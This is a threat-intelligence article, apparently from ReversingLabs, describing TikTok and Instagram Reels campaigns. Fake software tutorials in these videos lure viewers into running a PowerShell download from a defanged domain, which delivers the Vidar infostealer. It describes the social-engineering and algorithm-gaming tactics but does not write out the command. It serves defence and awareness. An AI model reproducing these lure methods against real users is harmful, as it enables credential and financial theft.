Phishing Attacks Leverage TikTok, Instagram Reels

Phishing Attacks Leverage TikTok, Instagram Reels

Short-form videos on social media apps are currently being leveraged by threat actors as a phishing vector, utilizing tutorial-style content with the promise of free premium software to lure victims onto malicious sites. This is an important threat to be aware of, as the videos can trick users into directly downloading malware. ReversingLabs (RL) analyzed two distinct campaigns that managed to reach a large audience by leveraging different metrics to game the content recommendation algorithms. Unfortunately, the algorithm and your trust in social media have signed you up for malware, with the likes of Vidarstealer on the table. 🚨

During RL researchers’ investigation of malicious social media videos, two different lure techniques were observed across accounts and platforms. Primarily conducted on TikTok and Instagram Reels, these campaigns use the same template to mass-produce videos and make regular posts. One methodology involves fake tutorials for software installs, featuring professional-sounding voiceovers and clean graphics. The second approach relies on posts demonstrating how to use premium software for free, spanning multiple videos, with a centralized tutorial introduced after the account gains traction. Regardless of the differing hooks, both campaign tactics seek to drive viewers to a secondary website hosting free software of dubious intent.

The malicious tutorial campaigns come from a myriad of almost identical accounts, with usernames like “windows.tips” or “windows.insights” and the same blue and white profile picture. This color palette mirrors the legitimate Windows social media account’s icon, which may help establish credibility for the malicious account. In one example, a potentially AI-generated voice reads out simple directions to unlock Spotify Premium. The video shows users step-by-step how to access Powershell from the Windows menu and what command to input to supposedly unlock this free service. The command will download scripts present at the specified address, and some users may believe the msget[.]run/spotify is a Microsoft-affiliated or otherwise legitimate domain. Attackers are relying on this lack of understanding. What makes the video dangerous is how clean and professional it appears, creating a false sense of authority. Saving is a very valuable interaction on posts, and this act causes the social media platform algorithm to push the content to more users. The fact that the video has nearly 200 more saves than likes proves how threat actors are targeting the more algorithmically valuable form of engagement.

Researchers extracted the executable at the msget[.]run/spotify domain and used ReversingLabs Spectra Analyze for a deeper look. The build.exe file delivered through this command is identified as Vidarstealer, confirming other reports of this phenomenon. Vidarstealer is a popular infostealer malware as a service (MaaS) offering that steals credentials, financial information, and tokens from victims. It is a long-standing malware that was updated in October of last year, making it more evasive and stable. This can be seen with its usage across various campaigns, like fake game cheats, malvertising, and more. The attackers using this malware seem to be targeting a variety of demographics and regions, with many targets being individual users.

The second type of video found has a completely different approach. The focus is short videos blasting trending music while scrolling through the features of premium software. These vague videos get users to ask questions, pondering how the poster was able to get free access to the program. Attackers use this technique and trust in it to provide directions to dangerous sites. If not using the comment reply approach, they will redirect users to a separate tutorial video or a link in their account description, in order to funnel victims to malicious sites. This involves links to sites advertised to contain the free software downloads. Some of these sites have been taken down. Researchers were able to explore the now inactive site using Spectra Analyze’s Interactive Sandbox. Regardless of any payload delivery, it’s clear these techniques can be used to drive traffic to any site, which can easily be something dangerous. By using multiple platforms, accounts, and posts, attackers are able to access many users.

For more details, check out the full article: Read full article